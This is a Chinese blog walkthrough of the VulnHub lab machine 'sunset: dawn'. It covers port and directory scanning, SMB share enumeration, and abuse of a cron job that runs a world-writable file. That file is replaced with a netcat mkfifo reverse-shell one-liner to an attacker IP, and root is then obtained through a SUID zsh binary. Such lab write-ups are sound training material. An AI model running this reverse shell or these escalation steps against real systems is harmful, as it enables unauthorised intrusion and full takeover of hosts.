vulnhub靶机-sunset：dawn

最新推荐文章于 2024-05-13 14:35:53 发布

0ne_

最新推荐文章于 2024-05-13 14:35:53 发布

阅读量1k

点赞数

分类专栏： vulnhub靶机

本文链接：https://blog.csdn.net/weixin_43784056/article/details/107390087

版权

vulnhub靶机专栏收录该内容

40 篇文章 14 订阅

订阅专栏

1、找到靶机ip：192.168.0.123

nmap 192.168.0.0/24

2、扫描靶机端口

root@kali:~# nmap -A -p- 192.168.0.123
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 192.168.0.123
Host is up (0.0090s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.5.5-10.3.15-MariaDB-1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.15-MariaDB-1
|   Thread ID: 14
|   Capabilities flags: 63486
|   Some Capabilities: LongColumnFlag, Support41Auth, FoundRows, InteractiveClient, SupportsTransactions, Speaks41ProtocolOld, ODBCClient, Speaks41ProtocolNew, IgnoreSigpipes, DontAllowDatabaseTableColumn, SupportsCompression, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: _R`iqz3,"dUZC$'7{-iL
|_  Auth Plugin Name: mysql_native_password
MAC Address: 08:00:27:45:9B:22 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: DAWN

Host script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: -1s
|_nbstat: NetBIOS name: DAWN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: dawn
|   NetBIOS computer name: DAWN\x00
|   Domain name: dawn
|   FQDN: dawn.dawn
|_  System time: 2020-07-16T06:39:06-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-07-16T10:39:06
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   8.97 ms 192.168.0.123

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.80 seconds

3、访问80端口，首页没有发现有用的东西

4、先放着，直接看看445端口，因为只有当445端口断开时，才会转发给139端口，使用smb连接，两种方法

第一种：使用命令连接

445端口

root@kali:~# smbclient -L //192.168.0.123
Enter WORKGROUP\root's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        ITDEPT          Disk      PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY.
        IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
SMB1 disabled -- no workgroup available
root@kali:~# smbclient //192.168.0.123/ITDEPT 
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Aug  3 11:23:20 2019
  ..                                  D        0  Sat Aug  3 11:21:39 2019

                7158264 blocks of size 1024. 3387808 blocks available
smb: \>

没有什么内容

第二种：使用文件夹图像化连接

445端口

这里就先放着，转而回去看80端口

5、扫描目录

root@kali:~# gobuster dir --url http://192.168.0.123/ --wordlist /usr/share/wordlists/dirb/big.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.0.123/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/07/16 18:49:32 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/cctv (Status: 301)
/logs (Status: 301)
/server-status (Status: 403)
===============================================================
Finished
===============================================================
root@kali:~#

cctv访问是403

logs访问有4个日志文件

前三个文件都是403

最后一个可以访问，挑几条重要的放在这里

2020/07/15 21:48:27 [31;1mCMD: UID=0    PID=462    | /bin/sh -c /root/pspy64 > /var/www/html/logs/management.log [0m
pspy64不就是之前用来查看后台进程的工具嘛，这个文件保存的就是当前运行的后台进程了，每隔一分钟执行一次


2020/07/16 07:13:02 [31;1mCMD: UID=0    PID=2034   | chmod 777 /home/dawn/ITDEPT/product-control [0m
2020/07/16 07:14:01 [31;1mCMD: UID=???  PID=2050   | chmod 777 /home/dawn/ITDEPT/product-control [0m
ITDEPT这不就是前面smb服务的文件夹么，每隔一分钟给product-control文件赋予777权限

2020/07/15 21:53:01 [31;1mCMD: UID=1000 PID=983    | /bin/sh -c /home/dawn/ITDEPT/product-control [0m
2020/07/15 21:54:01 [31;1mCMD: UID=1000 PID=1015   | /bin/sh -c /home/dawn/ITDEPT/product-control [0m
每隔一分钟执行一次


2020/07/15 21:54:01 [31;1mCMD: UID=0    PID=1014   | chmod 777 /home/dawn/ITDEPT/web-control [0m
2020/07/15 21:55:01 [31;1mCMD: UID=0    PID=1026   | chmod 777 /home/dawn/ITDEPT/web-control [0m

2020/07/15 21:55:01 [31;1mCMD: UID=33   PID=1031   | /bin/sh -c /home/dawn/ITDEPT/web-control [0m
2020/07/15 21:56:02 [31;1mCMD: UID=33   PID=1046   | /bin/sh -c /home/dawn/ITDEPT/web-control [0m
这个web-control文件和上面那个product-control文件一样，每隔一分钟被赋予777权限，每隔一分钟运行

两个文件中挑一个文件进行利用（这里我选用product-control），在本地新建该文件，写入反弹shell一句话，本地开启监听，smb连接，将该文件上传到靶机

root@kali:~# echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.107 4444 >/tmp/f' >product-control

6、使用sudo -l查看到可以使用root身份免密执行mysql命令，python提权到tty

$ sudo -l
Matching Defaults entries for dawn on dawn:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User dawn may run the following commands on dawn:
    (root) NOPASSWD: /usr/bin/mysql
$ python -c 'import pty;pty.spawn("/bin/bash")'
dawn@dawn:~$

7、想使用mysql命令提权，但是不知道密码，爆破错误次数太多就不给连接了，所以得想另外一种办法，查找拥有suid权限的命令，发现zsh命令，一个现成的shell，直接运行拿到root权限，拿到flag

dawn@dawn:~$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/sbin/mount.cifs
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/mount
/usr/bin/zsh
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/umount
/usr/bin/chfn
/home/dawn/ITDEPT
dawn@dawn:~$ zsh
zsh
dawn# whoami                                                                   
whoami
root
dawn# cd /root 
cd /root
dawn# ls                                                                       
ls
flag.txt  pspy64
dawn# cat flag.txt                                                             
cat flag.txt
Hello! whitecr0wz here. I would like to congratulate and thank you for finishing the ctf, however, there is another way of getting a shell(very similar though). Also, 4 other methods are available for rooting this box!

flag{3a3e52f0a6af0d6e36d7c1ced3a9fd59}

dawn#

0ne_

关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
vulnhub靶机-sunset：dawn

1、找到靶机ip：192.168.0.123nmap 192.168.0.0/24 2、扫描靶机端口root@kali:~# nmap -A -p- 192.168.0.123Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for 192.168.0.123Host is up (0.0090s latency).Not shown: 65531 closed portsPORT STATE SERV
复制链接

扫一扫